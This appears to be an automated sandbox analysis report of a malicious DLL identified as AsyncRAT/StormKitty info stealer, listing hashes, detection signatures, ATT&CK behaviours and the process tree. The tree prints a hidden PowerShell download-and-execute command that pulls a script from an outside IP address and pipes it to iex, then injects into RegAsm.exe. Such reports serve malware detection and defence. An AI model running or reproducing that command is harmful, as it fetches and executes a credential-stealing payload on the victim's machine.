Analysis
-
max time kernel
127s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-01-2025 03:47
Static task
static1
Behavioral task
behavioral1
Sample
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68.dll
Resource
win7-20241010-en
General
-
Target
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68.dll
-
Size
88KB
-
MD5
33ae2b9c3e710254fe2e2ce35ff8a7c8
-
SHA1
109e32187254b27e04ef18bbe1b48fad42bca841
-
SHA256
9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68
-
SHA512
2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599
-
SSDEEP
1536:L02ifPleVQ8zxlaSRslYzy26igsbuNdn4fuH1e6tsWy4cdlETcgS/iG:5iV4Qaxltsl/ggsCN3oBlQcgkiG
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/548-37-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 9 4764 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 4764 powershell.exe -
Downloads MZ/PE file
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4764 set thread context of 548 4764 powershell.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 4764 powershell.exe 548 RegAsm.exe 548 RegAsm.exe 548 RegAsm.exe 548 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4764 powershell.exe Token: SeDebugPrivilege 548 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 548 RegAsm.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1792 wrote to memory of 4304 1792 regsvr32.exe 83 PID 1792 wrote to memory of 4304 1792 regsvr32.exe 83 PID 1792 wrote to memory of 4304 1792 regsvr32.exe 83 PID 4304 wrote to memory of 624 4304 regsvr32.exe 84 PID 4304 wrote to memory of 624 4304 regsvr32.exe 84 PID 4304 wrote to memory of 624 4304 regsvr32.exe 84 PID 624 wrote to memory of 4764 624 cmd.exe 86 PID 624 wrote to memory of 4764 624 cmd.exe 86 PID 624 wrote to memory of 4764 624 cmd.exe 86 PID 4764 wrote to memory of 2712 4764 powershell.exe 87 PID 4764 wrote to memory of 2712 4764 powershell.exe 87 PID 4764 wrote to memory of 2712 4764 powershell.exe 87 PID 2712 wrote to memory of 1032 2712 csc.exe 88 PID 2712 wrote to memory of 1032 2712 csc.exe 88 PID 2712 wrote to memory of 1032 2712 csc.exe 88 PID 4764 wrote to memory of 1868 4764 powershell.exe 90 PID 4764 wrote to memory of 1868 4764 powershell.exe 90 PID 4764 wrote to memory of 1868 4764 powershell.exe 90 PID 4764 wrote to memory of 548 4764 powershell.exe 91 PID 4764 wrote to memory of 548 4764 powershell.exe 91 PID 4764 wrote to memory of 548 4764 powershell.exe 91 PID 4764 wrote to memory of 548 4764 powershell.exe 91 PID 4764 wrote to memory of 548 4764 powershell.exe 91 PID 4764 wrote to memory of 548 4764 powershell.exe 91 PID 4764 wrote to memory of 548 4764 powershell.exe 91 PID 4764 wrote to memory of 548 4764 powershell.exe 91
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68.dll1⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dbbn5gny\dbbn5gny.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA3A.tmp" "c:\Users\Admin\AppData\Local\Temp\dbbn5gny\CSC8973B30AD39B4B6DAC81C658F01EDB6.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:1032
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:1868
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:548
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51e48ea92136a1449802ce44c0a46da23
SHA16f8bc8cadc7e01cd3cc7265f19b474671ecfe0c6
SHA25660e6520951fd4cb2d1df6ec5ffa5422f318fc4d46c996b2363e4a779ffffc4f4
SHA5122bad1003c87a39aae8e319aac2458b1a5fba6de7fa7f8c06dbe15c56bd6d0fd4a0084112e941638bd37b9d5ff7fc461898965f24d88e9fe6a48c755bd3de7813
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD5084bad48c9771b309e2a221390f86936
SHA1de780aa204006d52e79b252394bfe55609fc67f1
SHA2564f27cd6b158674a79e5c4a8613f7d2416cc228ed0d64ac5e3769decc7f52569f
SHA51216b1f8c06496dc7dc4bfe1227cc7ba4cbcf88c8723270b050e6e33c814b8f6c1e4409fac52c0d540611f02515397bb4a1b42dd9c7c8b7fa69ad80d71b675504e
-
Filesize
652B
MD5c48e6af47243dea5bf081a1ad93e9653
SHA1a981c3ea9a6778ebcbf27bdd89ea585370177812
SHA256e96b322bdcb64ec3ebdc68d4205c8a1f177f4c96c8b5c445a5add5360f9366dc
SHA5125700dcc4c0885a4a02569c266dcba2798ede52e99edd52f089f09df68cbd61089262d03d72dba5e1294f5cbfa6149611ab847885cd6512d4520fe80c51254d9e
-
Filesize
10KB
MD53fa79decff8805745cea8116d9bb2643
SHA192343c5fa2c768b964ae3a4e9136e5d7193e8558
SHA256e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c
SHA5125c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78
-
Filesize
204B
MD509ccab2cfc00a6f063ef6c9a39541bf9
SHA14234426cf73af53177346504419f8d294507b2fe
SHA256580ece62026e58efe37c0fa00bf812454aecdcf22e31712276ecdc2a69c36e48
SHA512760818123acbbe2a9c1342fc0245a82ce1a36b4b5dcc9827efa3c2666dd4e90f1b8730f9cc73b37bd3573bda207226aee4853a1d3b5b76f32b1afc170b3c7ba3